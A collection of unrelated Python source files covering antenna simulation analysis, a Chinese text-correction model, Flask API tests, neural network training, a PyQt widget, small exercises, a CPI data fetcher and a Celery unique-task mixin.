spara_objval_vec = np.append(spara_objval_vec, spara_lin_objval_max)
return spara_objval_vec
def func_cst_data_farfield_analyse(self, singlerun_export_folder, ff_export_sub_folder):
# Get farfield data file list if it exists
ff_export_folder = os.path.join(singlerun_export_folder, ff_export_sub_folder)
if ff_export_sub_folder != "":
# Get all the farfield export data file
farfield_data_file_list = pycst_ctrl.func_file_list_get(ff_export_folder, ext='.txt')
else:
farfield_data_file_list = ""
# Initialize result vectors over all frequency samples
rotsym_objval_vec = np.array([])
cxlevel_objval_vec = np.array([])
taperang_objval_vec = np.array([])
sll_objval_vec = np.array([])
ar_ff_mae_objval_vec = np.array([])
ar_ff_max_objval_vec = np.array([])
for export_file in farfield_data_file_list:
theta_vec, dir_co_arr, dir_cx_arr, dir_abs_arr, \
dir_co_norm_arr, dir_cx_norm_arr, dir_abs_norm_arr, \
peak_co_cvec, peak_cx_cvec, peak_abs_cvec, \
ar_arr, ar_boresight_cvec = \
self.func_exp_ff_data_proc(ff_export_folder, export_file, self.np_theta, self.np_phi, self.pol_ind)
# Calculate rotational symmetry fitness
if self.rotsym_weight != 0:
rotsym_objval_freq = self.func_rotsym_objval_calc_mse(theta_vec, dir_co_norm_arr, self.taper,
self.rotsym_goal_val, self.rotsym_weight)
rotsym_objval_vec = np.append(rotsym_objval_vec, rotsym_objval_freq)
# Calculate Cx-Pol level fitness
if self.cxlevel_weight != 0:
cxlevel_objval_freq = self.func_cxlevel_objval_calc_trunc(dir_cx_norm_arr, self.cxlevel_goal_val,
self.cxlevel_weight, self.norm_factor)
cxlevel_objval_vec = np.append(cxlevel_objval_vec, cxlevel_objval_freq)
# Calculate taper angle fitness
if self.taperang_weight != 0:
taperang_objval_freq = self.func_taperang_objval_calc_rangetrunc(theta_vec, dir_co_norm_arr,
self.taper,
self.taperang_goal_range,
self.taperang_weight, self.norm_factor)
taperang_objval_vec = np.append(taperang_objval_vec, taperang_objval_freq)
# Calculate SLL fitness
if self.sll_weight != 0:
sll_objval_freq = self.func_sll_objval_calc_trunc(dir_co_norm_arr, self.sll_goal_val,
self.sll_weight, self.norm_factor)
sll_objval_vec = np.append(sll_objval_vec, sll_objval_freq)
# Calculate Farfield AR fitness
# Decide theta range for evaluation
taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, self.taper)
angle_range = np.array([-taper_ang, taper_ang])
# Calculate fitness over the theta range
if self.ar_ff_mae_weight != 0:
af_ff_mae_objval_freq = self.func_ar_ff_objval_calc_maetrunc(theta_vec, ar_arr, angle_range,
self.ar_ff_goal, self.ar_ff_mae_weight,
self.norm_factor)
ar_ff_mae_objval_vec = np.append(ar_ff_mae_objval_vec, af_ff_mae_objval_freq)
if self.ar_ff_max_weight != 0:
af_ff_max_objval_freq = self.func_ar_ff_objval_calc_maxtrunc(theta_vec, ar_arr, angle_range,
self.ar_ff_goal, self.ar_ff_max_weight,
self.norm_factor)
ar_ff_max_objval_vec = np.append(ar_ff_max_objval_vec, af_ff_max_objval_freq)
# Form radiation pattern objective value list
radpat_objval_vec = np.array([])
if self.rotsym_weight != 0:
radpat_objval_vec = np.append(radpat_objval_vec, rotsym_objval_vec.mean())
if self.cxlevel_weight != 0:
radpat_objval_vec = np.append(radpat_objval_vec, cxlevel_objval_vec.mean())
if self.taperang_weight != 0:
radpat_objval_vec = np.append(radpat_objval_vec, taperang_objval_vec.mean())
if self.sll_weight != 0:
radpat_objval_vec = np.append(radpat_objval_vec, sll_objval_vec.mean())
if self.ar_ff_mae_weight != 0:
radpat_objval_vec = np.append(radpat_objval_vec, ar_ff_mae_objval_vec.mean())
if self.ar_ff_max_weight != 0:
radpat_objval_vec = np.append(radpat_objval_vec, ar_ff_max_objval_vec.mean())
return radpat_objval_vec
def func_cst_data_analyse(self, singlerun_export_folder, run_id, ff_export_sub_folder):
# Evaluate S parameters
spara_objval_vec = self.func_cst_data_spara_analyse(singlerun_export_folder)
# Evaluate farfield
radpat_objval_vec = self.func_cst_data_farfield_analyse(singlerun_export_folder, ff_export_sub_folder)
# Evaluate near-field AR
nf_ar_objval_vec = np.array([])
nf_ar_file_name = self.nf_ar_file_name
nf_ar_goal_val = self.nf_ar_goal
nf_ar_mae_weight = self.nf_ar_mae_weight
nf_ar_maxnorm_weight = self.nf_ar_maxnorm_weight
nf_ar_eva_freq_range_vec = self.nf_ar_eva_freq_range_vec
if nf_ar_mae_weight != 0:
nf_ar_objval_mae = self.func_nf_ar_objval_calc_maetrunc(singlerun_export_folder, nf_ar_file_name,
nf_ar_goal_val, nf_ar_eva_freq_range_vec,
nf_ar_mae_weight)
# Form NF AR objective value list
nf_ar_objval_vec = np.append(nf_ar_objval_vec, nf_ar_objval_mae)
if nf_ar_maxnorm_weight != 0:
nf_ar_objval_max = self.func_nf_ar_objval_calc_maxnormtrunc(singlerun_export_folder, nf_ar_file_name,
nf_ar_goal_val, nf_ar_eva_freq_range_vec,
nf_ar_maxnorm_weight)
# Form near-field AR objective value list
nf_ar_objval_vec = np.append(nf_ar_objval_vec, nf_ar_objval_max)
# Combine all objective values
objval_vec = np.concatenate((spara_objval_vec, radpat_objval_vec, nf_ar_objval_vec))
objval_total = objval_vec.sum()
# print objective values
objval_vec_str = np.array2string(objval_vec, precision=7, separator=',', suppress_small=True)
pring_msg = "Sim[%d]: ObjValVec = %s; ObjVal = %f;" % (run_id, objval_vec_str, objval_total)
print(pring_msg)
return objval_total, objval_vec
|
python
|
# -*- coding:utf-8 -*-
"""
@description:
"""
import os
import sys
import numpy as np
import torch
from jiwer import wer
import sacrebleu
sys.path.append('..')
import config
from data_reader import load_word_dict
from seq2seq_model import Seq2SeqModel
from utils.logger import logger
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class Inference(object):
def __init__(self, arch, model_dir, embed_size=50, hidden_size=50, dropout=0.5, max_length=128,
batch_size=8, epochs=10, evaluate_during_training=True, eval_batch_size=64, evaluate_during_training_steps=2500):
logger.debug("device: {}".format(device))
if arch == "bert":
# Bert Seq2seq model
logger.debug('use bert seq2seq model.')
use_cuda = True if torch.cuda.is_available() else False
model_args = {
"reprocess_input_data": True,
"overwrite_output_dir": True,
"max_seq_length": max_length if max_length else 128,
"train_batch_size": batch_size if batch_size else 8,
"num_train_epochs": epochs if epochs else 10,
"save_eval_checkpoints": False,
"save_model_every_epoch": False,
"silent": False,
"evaluate_generated_text": True,
"evaluate_during_training": evaluate_during_training,
"evaluate_during_training_verbose": evaluate_during_training,
"eval_batch_size": eval_batch_size if eval_batch_size else 64,
"evaluate_during_training_steps": evaluate_during_training_steps if evaluate_during_training_steps else 2500,
"use_multiprocessing": False,
"save_best_model": True,
"max_length": max_length if max_length else 128, # The maximum length of the sequence
"output_dir": model_dir if model_dir else "output/bertseq2seq_demo/",
}
# encoder_type=None, encoder_name=None, decoder_name=None
self.model = Seq2SeqModel(arch, "{}/encoder".format(model_dir),
"{}/decoder".format(model_dir), args=model_args, use_cuda=use_cuda)
else:
logger.error('error arch: {}'.format(arch))
raise ValueError("Model arch choose error. Must use one of seq2seq model.")
self.arch = arch
self.max_length = max_length
def predict(self, sentence_list):
result = []
if self.arch == "bert":
corrected_sents = self.model.predict(sentence_list)
result = [i.replace(' ', '') for i in corrected_sents]
else:
raise ValueError('error arch.')
return result
if __name__ == "__main__":
m = Inference(config.arch,
config.model_dir,
embed_size=config.embed_size,
hidden_size=config.hidden_size,
dropout=config.dropout,
max_length=config.max_length,
batch_size=config.batch_size,
epochs=config.epochs,
evaluate_during_training=config.evaluate_during_training,
eval_batch_size=config.eval_batch_size,
evaluate_during_training_steps=config.evaluate_during_training_steps
)
print('开始预测,以Tab键中止')
while True:
inputs = input('输入文本:')
if inputs == '\t':
break
outputs = m.predict([inputs])
print('纠错结果为:'+outputs[0])
|
python
|
# Copyright 2016, 2017 John J. Rofrano. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Products API Service Test Suite
Test cases can be run with the following:
nosetests -v --with-spec --spec-color
coverage report -m
codecov --token=$CODECOV_TOKEN
"""
import unittest
import os
import logging
import mock
from flask_api import status # HTTP Status Codes
import app.service as service
import app.vcap_services as vcap
#from mock import MagicMock, patch
from app.models import Products, DataValidationError, db
from .product_factory import ProductFactory
DATABASE_URI = os.getenv('DATABASE_URI', 'sqlite:///../db/test.db')
######################################################################
# T E S T C A S E S
######################################################################
class TestProductsServer(unittest.TestCase):
""" Product Server Tests """
@classmethod
def setUpClass(cls):
""" Run once before all tests """
service.app.debug = False
service.initialize_logging(logging.INFO)
# Set up the test database
service.app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_URI
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
""" Runs before each test """
service.init_db()
db.drop_all() # clean up the last tests
db.create_all() # create new tables
self.app = service.app.test_client()
def tearDown(self):
db.session.remove()
db.drop_all()
def _create_products(self, count):
""" Factory method to create products in bulk """
products = []
for _ in range(count):
test_product = ProductFactory()
resp = self.app.post('/products',
json=test_product.serialize(),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED, 'Could not create test product')
new_product = resp.get_json()
test_product.id = new_product['id']
products.append(test_product)
return products
def test_index(self):
""" Test the Home Page """
resp = self.app.get('/')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
# data = resp.get_json()
# self.assertEqual(data['name'], 'Product Demo REST API Service')
def test_get_product_list(self):
""" Get a list of Products """
self._create_products(5)
resp = self.app.get('/products')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(len(data), 5)
def test_get_product(self):
""" Get a single Product """
# get the id of a product
test_product = self._create_products(1)[0]
resp = self.app.get('/products/{}'.format(test_product.id),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(data['name'], test_product.name)
def test_get_product_not_found(self):
""" Get a Product thats not found """
resp = self.app.get('/products/0')
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
def test_create_product(self):
""" Create a new Product """
test_product = ProductFactory()
resp = self.app.post('/products',
json=test_product.serialize(),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# Make sure location header is set
location = resp.headers.get('Location', None)
self.assertTrue(location != None)
# Check the data is correct
new_product = resp.get_json()
self.assertEqual(new_product['name'], test_product.name, "Names do not match")
self.assertEqual(new_product['category'], test_product.category, "Categories do not match")
self.assertEqual(new_product['available'], test_product.available, "Availability does not match")
# Check that the location header was correct
resp = self.app.get(location,
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
new_product = resp.get_json()
self.assertEqual(new_product['name'], test_product.name, "Names do not match")
self.assertEqual(new_product['category'], test_product.category, "Categories do not match")
self.assertEqual(new_product['available'], test_product.available, "Availability does not match")
def test_update_product(self):
""" Update an existing product """
# create a product to update
test_product = ProductFactory()
resp = self.app.post('/products',
json=test_product.serialize(),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# update the product
new_product = resp.get_json()
new_product['category'] = 'unknown'
resp = self.app.put('/products/{}'.format(new_product['id']),
json=new_product,
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
updated_product = resp.get_json()
self.assertEqual(updated_product['category'], 'unknown')
def test_unavailable_products(self):
""" Update an existing product to unavailable """
# create a product to update
test_product = ProductFactory()
resp = self.app.post('/products',
json=test_product.serialize(),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# update the product
new_product = resp.get_json()
new_product['available'] = True
resp = self.app.put('/products/{}/unavailable'.format(new_product['id']),
json=new_product,
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
updated_product = resp.get_json()
self.assertEqual(updated_product['available'], False)
def test_update_product_not_found(self):
""" Update a product that is not found """
test_product = ProductFactory()
resp = self.app.put('/products/0',
json=test_product.serialize(),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_product(self):
""" Delete a Product """
test_product = self._create_products(1)[0]
resp = self.app.delete('/products/{}'.format(test_product.id),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(len(resp.data), 0)
# make sure they are deleted
resp = self.app.get('/products/{}'.format(test_product.id),
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_all(self):
""" Delete DB """
self._create_products(5)
resp = self.app.get('/products')
self.assertEqual(resp.status_code, status.HTTP_200_OK)
resp = self.app.delete('/products/reset',
content_type='application/json')
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
def test_query_product_list_by_category(self):
""" Query Proucts by Category """
products = self._create_products(10)
test_category = products[0].category
category_products = [product for product in products if product.category == test_category]
resp = self.app.get('/products',
query_string='category={}'.format(test_category))
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(len(data), len(category_products))
# check the data just to be sure
for product in data:
self.assertEqual(product['category'], test_category)
def test_method_not_allowed(self):
""" Test a sending invalid http method """
resp = self.app.post('/products/1')
self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
'''
Commenting our the URI because it works with Travis but
Will not work on the IBM Environment
'''
# def test_database_uri(self):
# """Test database URI is available"""
# self.assertEqual(vcap.get_database_uri(), 'postgres://postgres:postgres@localhost:5432/postgres')
@mock.patch('app.service.Products.find_by_name')
def test_search_bad_data(self, products_find_mock):
""" Test a search that returns bad data """
products_find_mock.return_value = None
resp = self.app.get('/products', query_string='name=widget1')
self.assertEqual(resp.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)
@mock.patch('app.service.Products.find_by_name')
def test_mediatype_not_supported(self, media_mock):
""" Handles unsuppoted media requests with 415_UNSUPPORTED_MEDIA_TYPE """
media_mock.side_effect = DataValidationError()
resp = self.app.post('/products', query_string='name=widget1', content_type='application/pdf')
self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)
@mock.patch('app.service.Products.find_by_name')
def test_method_not_supported(self, method_mock):
""" Handles unsuppoted HTTP methods with 405_METHOD_NOT_SUPPORTED """
method_mock.side_effect = None
resp = self.app.put('/products', query_string='name=widget1')
self.assertEqual(resp.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
@mock.patch('app.service.Products.find_by_name')
def test_bad_request(self, bad_request_mock):
""" Test a Bad Request error from Find By Name """
bad_request_mock.side_effect = DataValidationError()
resp = self.app.get('/products', query_string='name=widget1')
self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
# @patch('app.service.product.find_by_name')
# def test_bad_request(self, bad_request_mock):
# """ Test a Bad Request error from Find By Name """
# bad_request_mock.side_effect = DataValidationError()
# resp = self.app.get('/products', query_string='name=fido')
# self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
#
# @patch('app.service.product.find_by_name')
# def test_mock_search_data(self, product_find_mock):
# """ Test showing how to mock data """
# product_find_mock.return_value = [MagicMock(serialize=lambda: {'name': 'fido'})]
# resp = self.app.get('/products', query_string='name=fido')
# self.assertEqual(resp.status_code, status.HTTP_200_OK)
######################################################################
# M A I N
######################################################################
if __name__ == '__main__':
unittest.main()
|
python
|
"""Helper neural network training module."""
from collections import OrderedDict
from pathlib import Path
from time import time
import torch
from torch import nn
from torch.utils.tensorboard import SummaryWriter
from ..datasets import IMAGE_SHAPES, get_loader
from ..models import fit_to_dataset, get_model
from ..models.utils import propagate_bounds
from .utils import (AverageMeter, bounds_logits, compute_accuracy,
get_device_order, manual_seed)
__all__ = ['train_classifier', 'one_epoch']
def train_classifier(evaluate_only, dataset, model, pretrained, learning_rate,
momentum, weight_decay, epsilon, factor, temperature,
epochs, batch_size, jobs, checkpoint, resume, log_dir,
seed):
"""Train and/or evaluate a network."""
manual_seed(seed, benchmark_otherwise=True)
resume = Path(resume if resume else '')
checkpoint = Path(checkpoint if checkpoint else '')
get_lr = lambda epoch: learning_rate * (0.1**(epoch // 30))
# get available cuda devices ordered by total memory capacity
devices = get_device_order()
if devices:
print(f'=> using {len(devices)} GPU(s)')
device = torch.device(f'cuda:{devices[0]}')
else:
device = torch.device('cpu')
def to_device(*tensors, non_blocking=True):
return [t.to(device, non_blocking=non_blocking) for t in tensors]
# Data loading code
cuda = len(devices) > 0
train_loader = get_loader(dataset, True, batch_size, cuda, jobs)
val_loader = get_loader(dataset, False, batch_size, cuda, jobs)
norm = train_loader.dataset.transform.transforms[-1]
input_ranges = [(1 - m) / s + m / s for m, s in zip(norm.mean, norm.std)]
input_range = sum(input_ranges) / len(input_ranges)
# create the model
if pretrained:
print(f'=> using pre-trained model {model}')
else:
print(f'=> creating model {model}')
net = fit_to_dataset(get_model(model, pretrained), dataset).eval()
keys = net.state_dict(keep_vars=True).keys()
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss()
to_device(net, criterion, non_blocking=False)
optimizer = torch.optim.SGD(
net.parameters(),
learning_rate,
momentum=momentum,
weight_decay=weight_decay)
# define a colsure wrapping one_epoch()
def process(loader, optimizer=None):
return one_epoch(loader, net, criterion, optimizer, to_device,
epsilon * input_range, factor, temperature)
# optionally resume from a checkpoint
best_acc1 = 0
start_epoch = 0
if resume.is_file():
print("=> loading checkpoint '{}'".format(resume))
state = torch.load(resume)
start_epoch = state['epoch']
best_acc1 = state['best_acc1']
net.load_state_dict(state['state_dict'])
optimizer.load_state_dict(state['optimizer'])
print(f"=> loaded checkpoint '{resume}' (epoch {state['epoch']})")
elif resume != Path():
print(f"=> no checkpoint found at '{resume}'")
# DataParallel will divide and allocate batch_size to all GPUs
if len(devices) > 1:
if model.startswith('alexnet') or model.startswith('vgg'):
net.features = nn.DataParallel(net.features, devices, device)
else:
net = nn.DataParallel(net, devices, device)
# evaluate the model before training
progress = process(val_loader)
val_loss = progress['Loss']
val_acc = progress['Acc@1']
print(f'Test[{val_loss}: {val_acc}%]')
if evaluate_only:
return
if log_dir:
writer = SummaryWriter(log_dir)
example_image = torch.randn(1, *IMAGE_SHAPES[dataset], device=device)
writer.add_graph(net, (example_image,))
lr = get_lr(start_epoch)
for epoch in range(start_epoch, epochs):
# decay the learning rate by 10 every 30 epochs
if epoch % 30 == 0:
lr = get_lr(epoch)
for param_group in optimizer.param_groups:
param_group['lr'] = lr
# train for one epoch and evaluate on validation set
train_progress = process(train_loader, optimizer)
train_loss = train_progress['Loss']
train_acc = train_progress['Acc@1']
val_progress = process(val_loader)
val_loss = val_progress['Loss']
val_acc = val_progress['Acc@1']
print(f'[{epoch + 1}@{lr:.4e}] '
f'Train[{train_loss}: {train_acc}%] '
f'Test[{val_loss}: {val_acc}%]')
if log_dir:
writer.add_scalar('Train/LearingRate', lr, epoch)
for meter in train_progress.values():
writer.add_scalar(f'Train/{meter.name}', meter.avg, epoch)
for meter in val_progress.values():
writer.add_scalar(f'Test/{meter.name}', meter.avg, epoch)
# remember best acc@1 and save checkpoint
if val_acc.avg >= best_acc1:
best_acc1 = val_acc.avg
if checkpoint != Path():
parameters = net.state_dict().values()
torch.save({
'epoch': epoch + 1,
'state_dict': OrderedDict(zip(keys, parameters)),
'best_acc1': best_acc1,
'optimizer': optimizer.state_dict(),
}, checkpoint)
if train_loss != train_loss:
print('Training was stopped (reached NaN)!')
break
if log_dir:
writer.close()
def one_epoch(train_loader, net, criterion, optimizer, preporcess, epsilon,
factor, temperature):
"""Perform one training epoch."""
batch_time = AverageMeter('Time/BatchTotal', ':6.3f')
data_time = AverageMeter('Time/BatchData', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
# switch to train mode
is_training = optimizer is not None
net.train(is_training)
def compute_loss(inputs, targets, update_metrics):
# compute output
output = net(inputs)
loss = criterion(output, targets)
# compute bounds loss
if epsilon > 0 and factor > 0:
bounds = propagate_bounds(net, inputs, epsilon)
logits = bounds_logits(output, bounds.offset, targets)
max_abs_logits = logits.abs().max(1).values.view(-1, 1)
logits = logits / (temperature * max_abs_logits)
loss += factor * criterion(logits, targets)
# measure accuracy and record loss
if update_metrics:
n = inputs.size(0)
acc1, acc5 = compute_accuracy( # pylint: disable=E0632
output, targets, top_k=(1, 5))
losses.update(float(loss), n)
top1.update(float(acc1), n)
top5.update(float(acc5), n)
# compute gradient
if is_training:
optimizer.zero_grad()
loss.backward()
return loss
with torch.set_grad_enabled(is_training):
end = time()
for inputs, targets in train_loader:
# measure data loading time
data_time.update(time() - end)
# move data to device
inputs, targets = preporcess(inputs, targets)
first_time = True
def closure():
nonlocal first_time
loss = compute_loss(
inputs, # pylint: disable=W0640
targets, # pylint: disable=W0640
first_time,
)
first_time = False
return loss
if is_training:
optimizer.step(closure)
else:
closure()
# measure elapsed time
batch_time.update(time() - end)
end = time()
return {x.name: x for x in (batch_time, data_time, losses, top1, top5)}
|
python
|
from PyQt5 import QtWidgets
from otter.OListView import OListView
class TemplatesTab(QtWidgets.QWidget):
"""
List of recent file that show on the MainWindow
"""
def __init__(self, parent):
super().__init__(parent)
main_layout = QtWidgets.QVBoxLayout()
main_layout.setContentsMargins(10, 10, 10, 0)
self.template_list = OListView(self)
self.template_list.setEmptyMessage("No templates")
self.template_list.setSelectionMode(
QtWidgets.QAbstractItemView.SingleSelection)
main_layout.addWidget(self.template_list)
button_layout = QtWidgets.QHBoxLayout()
button_layout.setContentsMargins(0, 0, 0, 0)
self.new_button = QtWidgets.QPushButton("New", self)
self.new_button.setContentsMargins(0, 0, 10, 0)
button_layout.addWidget(self.new_button)
button_layout.addStretch()
self.open_button = QtWidgets.QPushButton("Open", self)
button_layout.addWidget(self.open_button)
main_layout.addLayout(button_layout)
self.setLayout(main_layout)
self.new_button.clicked.connect(self.onNew)
self.open_button.clicked.connect(self.onOpen)
self.updateWidgets()
def updateWidgets(self):
"""
Update controls
"""
if len(self.template_list.selectedIndexes()) == 1:
self.open_button.setEnabled()
else:
self.open_button.setEnabled(False)
def onNew(self):
"""
Called when clicked on 'New' button
"""
def onOpen(self):
"""
Called when clicked on 'Open' button
"""
|
python
|
import string
def alphabetSubsequence(s):
seen = -1
for i in s:
index = string.ascii_lowercase.find(i)
if index > seen:
seen = index
else:
return False
return True
s = "effg"
print(alphabetSubsequence(s))
|
python
|
import os
import sys
import inspect
import string
import numpy as np
PycQED_py3_dir = "D:\\Github\\PycQED_py3"
AssemblerDir = PycQED_py3_dir + \
"\\instrument_drivers\\physical_instruments\\_controlbox"
currentdir = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.append(AssemblerDir)
import Assembler
import old_assembler
qasm_ext = ".txt"
print('Number of arguments:', len(sys.argv), 'arguments.')
print('Argument List:', str(sys.argv))
if len(sys.argv) != 2:
print("Error: Asm2Mem only receives one arguments as the assembly file.")
exit(0)
rawinput = sys.argv[1]
print("The file read from the argument is:", rawinput)
asm_name = rawinput
if not os.path.isfile(asm_name):
print("\tError! The file does not exist")
if (asm_name[-len(qasm_ext):] != qasm_ext):
print("\t Error! The input asm file should have the", qasm_ext,
"extension. ")
exit(0)
asm1 = Assembler.Assembler(asm_name)
instructions1 = asm1.convert_to_instructions()
asm2 = old_assembler.Assembler(asm_name)
instructions2 = asm2.convert_to_instructions()
print("compare Result: ", np.array_equal(instructions1, instructions2))
assert(len(instructions1) == len(instructions2))
print("instructions1", '\t', "instructions2")
for i in range(len(instructions1)):
print(instructions1[i], '\t', instructions2[i])
|
python
|
val = input().split()
a, b, c = val
a = float(a)
b = float(b)
c = float(c)
if a < (a+b) and b < (c+a) and c < (a+b):
per = a + b + c
print('Area = %.2f' %per)
|
python
|
import pandas
import numpy
import filepaths
import utils
def fetch_ng_inflation_cpi():
stats_metadata = utils.read_stats_metadata()
url = stats_metadata['NG']['inflation']['CPI']['url']
tmp_filepath = utils.download_file(url)
df = pandas.read_excel(tmp_filepath, sheet_name='Table1', header=None)
df = df[17:331]
output_df = pandas.DataFrame({'year': df.iloc[:, 0], 'month': df.iloc[:, 1], 'observation': df.iloc[:, 5]})
# there must be a simpler way to do this, anyway, it replaces empty years with their correct value
clean_years = []
last_year = 0
for i in output_df.year.to_list():
if type(i) == int:
clean_years.append(i)
last_year = i
elif i is numpy.NaN:
clean_years.append(last_year)
output_df.year = clean_years
# some months are 3-letter, others are full name – replace with number value
month_map = {
'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06', 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12',
'January': '01', 'February': '02', 'March': '03', 'April': '04', 'May': '05', 'June': '06', 'July': '07', 'August': '08', 'September': '09', 'October': '10', 'November': '11', 'December': '12',
}
output_df.month = output_df.month.map(month_map)
output_df["month"] = output_df["year"].astype(str) + '-' + output_df["month"]
output_df.drop('year', axis=1, inplace=True)
output_filepath = filepaths.DATA_DIR / stats_metadata['NG']['inflation']['CPI']['filename']
output_df.to_csv(output_filepath, index=False)
if __name__ == '__main__':
fetch_ng_inflation_cpi()
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import datetime
UNIQUE_REDIS_KEY_PREFIX = 'celery_unique'
class UniqueTaskMixin(object):
abstract = True
unique_key = None
redis_client = None
def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, link=None, link_error=None, **options):
"""Apply tasks asynchronously by sending a message.
This method serves either as a wrapper for `celery.Task.apply_async()` or, if the task decorator
was configured with a `redis_client`, callable `unique_key` and `apply_async()` was called with
either an `eta` or `countdown` argument, the task will be treated as unique. In these cases,
this method will first revoke any extant task which matches the same unique key configuration
before proceeding to publish the task. Before returning, a unique task's identifying unique key
will be saved to Redis as a key, with its task id (provided by the newly-created `AsyncResult` instance)
serving as the value.
@see `celery.Task.apply_async()`
"""
should_handle_as_unique_task = (
callable(self.unique_key)
and ('eta' in options.keys() or 'countdown' in options.keys())
and self.redis_client is not None
)
if should_handle_as_unique_task:
# Generate the unique redis key and revoke any task that shares the same key (if one exists)
unique_redis_key = self._make_redis_key(args, kwargs)
self._revoke_extant_unique_task_if_exists(unique_redis_key)
# Pass the task along to Celery for publishing and intercept the AsyncResult return value
rv = super(UniqueTaskMixin, self).apply_async(args, kwargs, task_id, producer, link, link_error, **options)
if should_handle_as_unique_task:
# Create a Redis key/value pair to serve as a tracking record for the newly-created task.
# The new record will be given a TTL that allows it to expire (approximately) at the same time
# that the task is executed.
ttl = self._make_ttl_for_unique_task_record(options)
self._create_unique_task_record(unique_redis_key, rv.task_id, ttl)
return rv
def _make_redis_key(self, callback_args, callback_kwargs):
"""Creates a key used to identify the task's unique configuration in Redis.
@note All positional arguments and/or keyword arguments sent to the task are applied identically to
the task's bound `unique_key` callable.
@param callback_args: The positional arguments which will be passed to the task when it executes
@type callback_args: list | tuple
@param callback_kwargs: The keyword arguments which will be passed to the task when it executes
@type callback_kwargs: dict
@return: The key which will be used to find any extant version of this task which, if found,
will by revoked. Keys are built by using three colon-delimited components:
1. A global prefix used to identify that the key/value pair in Redis was created to track
a unique Celery task (by default, this is "celery_unique")
2. The name of the task (usually the Python dot-notation path to the function)
3. The value produced by the `key_generator` callable when supplied with the task's callback
arguments.
@rtype: unicode
"""
# Get the unbound lambda used to create `self.unique_key` if the inner function exists
key_generator = self.unique_key.__func__ if hasattr(self.unique_key, '__func__') else self.unique_key
# Create and return the redis key with the generated unique key suffix
return '{prefix}:{task_name}:{unique_key}'.format(
prefix=UNIQUE_REDIS_KEY_PREFIX,
task_name=self.name,
unique_key=key_generator(
*(callback_args or ()),
**(callback_kwargs or {})
)
)
def _revoke_extant_unique_task_if_exists(self, redis_key):
"""Given a Redis key, deletes the corresponding record if one exists.
@param redis_key: The string (potentially) used by Redis as the key for the record
@type redis_key: str | unicode
"""
task_id = self.redis_client.get(redis_key)
if task_id is not None:
self.app.AsyncResult(task_id).revoke()
self.redis_client.delete(redis_key)
def _create_unique_task_record(self, redis_key, task_id, ttl):
"""Creates a new Redis key/value pair for the recently-published unique task.
@param redis_key: The unique key which identifies the task and its configuration (expected to be produced
by the `UniqueTaskMixin._make_redis_key()` method).
@type redis_key: str | unicode
@param task_id: The ID of the recently-published unique task, which will be used as the Redis value
@param ttl: The TTL for the Redis record, which should be (approximately) equal to the number of seconds
remaining until the earliest time that the task is expected to be executed by Celery.
"""
self.redis_client.set(redis_key, task_id, ex=ttl)
@staticmethod
def _make_ttl_for_unique_task_record(task_options):
"""Given the options provided to `apply_async()` as keyword arguments, determines the appropriate
TTL to ensure that a unique task record in Redis expires (approximately) at the same time as the earliest
time that the task is expected to be executed by Celery.
The TTL value will be determined by examining the following values, in order of preference:
- The `eta` keyword argument passed to `apply_async()`, if any. If this value is found,
then the TTL will be the number of seconds between now and the ETA datetime.
- The `countdown` keyword argument passed to `apply_async()`, which will theoretically always
exist if `eta` was not provided. If this value is used, the TTL will be equal.
Additionally, if an `expires` keyword argument was passed, and its value represents (either as an integer
or timedelta) a shorter duration of time than the values provided by `eta` or `countdown`, the TTL will be
reduced to the value of `countdown`.
Finally, the TTL value returned by this method will always be greater than or equal to 1, in order to ensure
compatibility with Redis' TTL requirements, and that a record produced for a nonexistent task will only
live for a maximum of 1 second.
@param task_options: The values passed as additional keyword arguments to `apply_async()`
@type task_options: dict
